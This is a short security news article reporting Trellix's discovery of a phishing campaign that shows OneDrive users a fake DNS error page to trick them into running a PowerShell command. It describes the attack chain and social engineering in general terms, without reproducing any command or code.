Sophisticated Phishing Campaign Targets Microsoft OneDrive Users

Written by

Security researchers have uncovered a sophisticated phishing campaign targeting Microsoft OneDrive users. The campaign employs advanced social engineering tactics to trick users into executing a PowerShell script, compromising their systems. 

The attack, discovered by the Trellix Advanced Research Center, begins with an email containing an HTML file urging users to resolve a DNS issue to access a OneDrive file.

Upon opening the HTML file, users are shown an image simulating a OneDrive page, displaying an error message about a DNS issue and prompting them with two buttons: “Details” and “How to fix.” Clicking “Details” directs users to a legitimate Microsoft Learn page on DNS troubleshooting. However, the “How to fix” button executes a JavaScript function within the HTML file, guiding users to open the Windows PowerShell terminal and run a specific command.

When executed, the command flushes the DNS cache and creates a folder named “downloads” on the C: drive. It then downloads an archive file, extracts its contents and runs a script. Trellix explained that this sequence of actions highlights the attackers’ use of legitimate-looking processes to deceive users into compromising their systems. 

“This combination of technical jargon and urgent error messages is a classic social engineering tactic, designed to manipulate the user’s emotions and prompt hasty action without careful consideration,” the company explained.

By decoding Base64 encoded strings and copying commands to the clipboard, the attackers effectively manipulate users into executing the malicious script.

“In a corporate setting, the impact of such an attack could extend beyond individual data breaches to include widespread network compromise, significant financial losses and severe reputational damage,” Trellix said.

Read more on social engineering tactics: 92% of Organizations Hit by Credential Compromise from Social Engineering Attacks

The company added that the campaign highlights the constant risk of social engineering in the cybersecurity field.

“Enterprises must remain vigilant, continuously educating their workforce and reinforcing security measures to defend against such sophisticated attacks. The global distribution of this attack highlights the need for international cooperation and intelligence sharing to effectively combat these threats.”

Image credit: sdx15 / Shutterstock.com

What’s hot on Infosecurity Magazine?